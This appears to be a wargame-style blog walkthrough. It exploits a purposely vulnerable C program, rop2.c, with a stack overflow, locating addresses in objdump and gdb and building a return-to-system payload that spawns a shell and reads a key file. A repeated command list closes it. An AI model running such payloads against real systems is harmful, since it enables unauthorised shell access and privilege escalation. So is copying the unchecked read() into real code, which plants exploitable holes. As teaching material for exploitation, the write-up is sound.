# cat blog >> /dev/brain 2> /proc/mind
$ cat rop2.c
// rop2.c - deliberately vulnerable target for the ROP walkthrough below.
// Do not "fix" the overflow: the padding length and the addresses used in
// the exploit further down depend on this exact code.
#undef _FORTIFY_SOURCE   // presumably so glibc's fortified read() wrapper does not abort the oversized read - confirm
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Never referenced by any code path. Its only role is to hold a pointer to
// the "/bin/bash" literal, which the exploit passes as system()'s argument.
char * not_used = "/bin/bash";

// Never called by main(). The exploit returns into the middle of this
// function, at the instruction that calls system(), reusing that call with
// an attacker-supplied argument word.
int not_called() {
    return system("/bin/date");
}

// The bug: a 128-byte stack buffer, a 256-byte read(), no length check and
// the return value of read() ignored. Input past byte 128 overwrites the
// saved frame pointer and return address of this frame.
void vulnerable_function() {
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}

// The getegid()/setresgid() dance suggests the binary is meant to run
// setgid (e.g. to read `key` below); the page does not show how it is installed.
void be_nice_to_people() {
    // /bin/sh is usually symlinked to bash, which usually drops privs. Make
    // sure we don't drop privs if we exec bash, (ie if we call system()).
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

// argc/argv are unused; all attacker input arrives on stdin.
int main(int argc, char** argv) {
    be_nice_to_people();
    vulnerable_function();
    write(STDOUT_FILENO, "Hello, World\n", 13);
}
# Symbol table: addresses of not_called() (.text) and not_used (.data).
# Fixed, reproducible addresses imply a non-PIE build with no ASLR applied to
# these sections, and the overflow reaching the return address implies no
# stack canary - the build flags are not shown here, so confirm before reuse.
$ objdump -t ./rop2 | grep not_
080484a4 g F .text 00000014 not_called
0804a024 g O .data 00000004 not_used
$ gdb ./rop2
(gdb) set disassembly-flavor intel
# Body of not_called(). The "gadget" is the `call` at 0x80484b1: when the
# overwritten return address sends execution there, the `call` pushes its own
# return address, so the word the attacker placed right after the forged
# return address becomes system()'s first argument ([esp+4] inside the callee).
(gdb) x/7i 0x080484a4
0x80484a4 : push ebp
0x80484a5 : mov ebp,esp
0x80484a7 : sub esp,0x18
0x80484aa : mov DWORD PTR [esp],0x804861a
0x80484b1 : call 0x80483a0
0x80484b6 : leave
0x80484b7 : ret
# The word stored in not_used: the address of the "/bin/bash" literal.
(gdb) x/xw 0x0804a024
0x804a024 : 0x08048610
# Payload: 140 bytes of filler (the distance from buf to the saved return
# address in this particular build), then 0x080484b1 (the `call` inside
# not_called(), little-endian), then 0x08048610 (pointer to "/bin/bash") as
# the argument system() will see. `cat` keeps stdin open after the payload so
# the lines typed next reach the spawned shell instead of hitting EOF.
$ (python -c 'print "\x90"*140 + "\xb1\x84\x04\x08" + "\x10\x86\x04\x08"'; cat) | ./rop2
cat key
i_could_get_used_to_this_rop_thing
cat rop2.c
# Symbol table lookup: addresses of not_called() (.text) and not_used (.data).
objdump -t ./rop2 | grep not_
gdb ./rop2
# The next three lines are gdb commands, entered at the (gdb) prompt.
set disassembly-flavor intel
# Disassemble not_called() to find the `call` to system() inside it; that
# instruction's address is the return target used in the payload.
x/7i 0x080484a4
# Read the pointer stored in not_used; per the C source it points at the
# "/bin/bash" literal and becomes system()'s argument.
x/xw 0x0804a024
# Back in the shell. Payload: 140 bytes of filler, the address of the `call`
# inside not_called(), then the pointer from not_used. `cat` keeps stdin open
# so later input reaches the spawned shell.
(python -c 'print "\x90"*140 + "\xb1\x84\x04\x08" + "\x10\x86\x04\x08"'; cat) | ./rop2
# Typed into the spawned shell, not the original one.
cat key